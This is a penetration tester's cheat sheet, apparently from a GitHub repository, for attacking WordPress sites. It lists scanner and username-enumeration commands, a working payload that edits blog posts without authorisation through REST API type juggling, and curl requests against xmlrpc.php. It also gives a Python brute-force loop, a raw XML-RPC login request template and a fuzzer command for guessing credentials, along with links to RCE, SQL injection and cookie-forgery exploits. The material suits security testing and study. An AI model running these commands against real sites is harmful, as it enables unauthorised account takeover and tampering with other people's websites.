-
Notifications
You must be signed in to change notification settings - Fork 83
/
wordpress
82 lines (61 loc) · 3.32 KB
/
wordpress
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
# wordpress
# scanners
wpscan --url blah.com -e u,vt,vp (based on https://wpvulndb.com/)
# fingerprint
GET /readme.html
./plecost/PKGBUILD:pkgdesc="Wordpress finger printer tool search and retrieve information about the plugins versions installed in Wordpress systems."
# exploit framework
http://pentestit.com/wpxf-wordpress-exploit-framework/
# username enumeration
?author=1
# releases
https://wordpress.org/news/category/releases/
# unauth modification of blog posts < 4.7.2 due to type juggling
https://blogs.akamai.com/2017/02/wordpress-web-api-vulnerability.html
authorization checks can be bypassed by including an "id" parameter value in either the query_string or POST payload that contains any non-numeric character
post('/index.php/wp-json/wp/v2/posts/1', json={"id":"1aha","title":"owned","content":"haha"})
# xss in comments to rce (affected: 4.2, 4.1.2, 3.9.3 ...)
http://klikki.fi/adv/wordpress2.html
# rce
http://vagosec.org/2013/12/wordpress-rce-exploit/
# sqli + rce
http://blog.checkpoint.com/2015/08/11/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-ii-supremacy/
# cookie integrity fail CVE-2008-1930 <=2.5
https://pentesterlab.com/exercises/cve-2008-1930/course
# auth cookie forgery wordpress <3.7.2 & <3.8.2
http://www.securitysift.com/understanding-wordpress-auth-cookies/
https://labs.mwrinfosecurity.com/blog/2014/04/11/wordpress-auth-cookie-forgery/
# bf login creds via /xmlrpc.php when wp-login.php is filtered
# with wp < 4.4.1 you can send 500 l/p in one request to bypass rate limiting
https://github.com/zendoctor/wpbrute-rpc
https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html -> msf/auxiliary/scanner/http/wordpress_multicall_creds
http://www.hsc-news.com/archives/2014/000123.html
$ echo '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' > get_method.xml
List avail methods first (methods can be removed in the wp configuration)
$ curl -v -H "User-Agent: Mozilla/5.0" -X POST -d @get_method.xml --url "http://cible.com/xmlrpc.php"
NB : si cette requête vous renvoie un code d'erreur (403, 400, 501,etc.),
outre les tests habituels avec les entêtes de provenances "X-*", vérifiez une
méthode exotique comme :
$ curl -v -H "User-Agent: Mozilla/5.0" -X TOTO -d @get_method.xml --url "http://cible.com/xmlrpc.php"
import xmlrpclib
bruteForce(url,listUser, listPassword):
server = xmlrpclib.Server(url) #url = http://cible.com/xmlrpc.php
for user in listUser :
for pwd in listPassword :
param=['',user,pwd]
try:
res=server.blogger.getUserInfo(param)
except Exception as im :
pass
else:
print " Win \o/ : "+user+" : "+pwd
or
POST /xmlrpc.php HTTP/1.1
Host: blah
Accept-Encoding: gzip
User-Agent: xmlrpclib.py/1.0.1 (by www.pythonware.com)
Content-Type: text/xml
Content-Length: 286
<?xml version='1.0'?><methodCall><methodName>blogger.getUserInfo</methodName><params><param><value><array><data><value><string></string></value><value><string>admin</string></value><value><string><![CDATA[FILE0]]></string></value></data></array></value></param></params></methodCall>
zombies use wp.getCategories
http_fuzz url='/xmlrpc.php' header='Content-Type: text/xml' method=POST body=@body.xml auto_urlencode=0 -x ignore:fgrep='Incorrect username or password'